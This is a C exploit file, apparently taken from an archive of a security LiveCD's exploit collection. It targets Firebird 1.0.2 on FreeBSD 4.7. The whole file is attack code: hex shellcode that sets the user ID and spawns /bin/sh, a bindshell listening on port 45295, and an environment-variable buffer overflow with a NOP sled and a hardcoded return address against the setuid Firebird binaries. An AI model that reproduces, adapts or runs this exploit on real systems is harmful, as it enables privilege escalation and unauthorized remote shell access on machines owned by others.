home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / database / firebird / DSR-firebird.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  4KB  |  160 lines

---

1. /* DSR-firebird.c by bob@dtors.net
2.    -------------------------------
3.  
4. Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
5.  
6. bash-2.05a$ ./DSR-firebird
7. ( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
8. ( (                           by - bob@dtors.net ) )
9. ----------------------------------------------------
10.  
11. Usage: ./DSR-firebird <target#>
12. Targets:
13. 1. [0xbfbff75d] - gds_inet_server
14. 2. [0xbfbff75c] - gds_lock_mgr
15. 3. [0xbfbff75e] - gds_drop
16.  
17. www.dtors.net
18. bash-2.05a$
19.  
20. Thanks goto eSDee && ilja for helping me
21. with the gds_lock_mgr problems.
22.  
23. bob@dtors.net
24. */
25.  
26.  
27. #include <stdio.h>
28. #include <stdlib.h>
29. #include <string.h>
30. #define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
31. #define DROP    "/usr/local/firebird/bin/gds_drop"
32. #define INET    "/usr/local/firebird/bin/gds_inet_server"
33. #define LEN     1056
34.  
35. char dropcode[]=
36.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
37.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
38.    "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
39.    "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
40.  
41. char inetcode[]=
42.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
43.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
44.    "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
45.    "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
46.  
47.  
48.  
49. char lockcode[]=
50.  "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
51.  "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
52.  "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" file://setuid[firebird] by bob
53.  "\x31\xc0\x31\xdb\x53\xb3\x06\x53" file://fork() bindshell by eSDee
54.  "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
55.  "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
56.  "\x50\x50\x66\x68\xb0\xef\xb7\x02"
57.       "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
58.       "\x53\x51\x57\x50\xb0\x68\xcd\x80"
59.       "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
60.       "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
61.       "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
62.       "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
63.       "\xe2\x50\x51\x52\xb3\x14\x53\x50"
64.       "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
65.       "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
66.       "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
67.       "\x39\xc3\x75\x44\x31\xc0\x57\x50"
68.       "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
69.       "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
70.       "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
71.       "\x80\x31\xc0\x43\x53\x56\x50\xb0"
72.       "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
73.       "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
74.       "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
75.       "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
76.       "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
77.       "\xeb\x9a";
78.  
79. char *decide(char *string)
80. {
81.     if(!(strcmp(string, "1")))
82.       return((char *)&inetcode);
83.     if(!(strcmp(string, "2")))
84.       return((char *)&lockcode);
85.     if(!(strcmp(string, "3")))
86.       return((char *)&dropcode);
87.     exit(0);
88. }
89.  
90. int main(int argc, char **argv)
91. {
92.  
93.  unsigned long ret = 0xbfbff743;
94.  
95.  char *selectcode;
96.  char buffer[LEN];
97.  char egg[1024];
98.  char *ptr;
99.  int i=0;
100.  
101.  
102.  
103.  if(argc < 2)
104.  {
105.   printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
106.   printf("( (                           by - bob@dtors.net ) )\n");
107.   printf("----------------------------------------------------\n\n");
108.   printf("Usage: %s <target#> \n", argv[0]);
109.   printf("Targets:\n");
110.   printf("1. [0xbfbff743] - gds_inet_server\n");
111.   printf("2. [0xbfbff743] - gds_lock_mgr\n");
112.   printf("3. [0xbfbff743] - gds_drop\n");
113.   printf("\nwww.dtors.net\n");
114.   exit(0);
115.  }
116.  
117.  selectcode = (char *)decide(argv[1]);
118.    memset(buffer, 0x41, sizeof(buffer));
119.  
120.         ptr = egg;
121.  
122.         for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
123.         for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
124.         egg[1024 - 1] = '\0';
125.  
126.         memcpy(egg,"EGG=",4);
127.         putenv(egg);
128.  
129.         memcpy(&buffer[1052],(char *)&ret,4);
130.         buffer[1056] = 0;
131.  
132.         setenv("INTERBASE", buffer, 1);
133.  
134.         fprintf(stdout, "Return Address: 0x%x\n", ret);
135.         fprintf(stdout, "Buffer Size: %d\n", LEN);
136.         fprintf(stdout, "Setuid [90]\n");
137.  
138. if(selectcode == (char *)&inetcode)
139.   {
140.  execl(INET, INET, NULL);
141.  return 0;
142.    }
143.  
144. if(selectcode == (char *)&lockcode)
145.   {
146.   printf("\nShell is on port 45295\nExploit will hang!\n");
147.  execl(LOCK, LOCK, NULL);
148.  return 0;
149.    }
150.  
151. if(selectcode == (char *)&dropcode)
152.   {
153.  execl(DROP, DROP, NULL);
154.  return 0;
155.    }
156.  
157.  
158.  return 0;
159. }
160.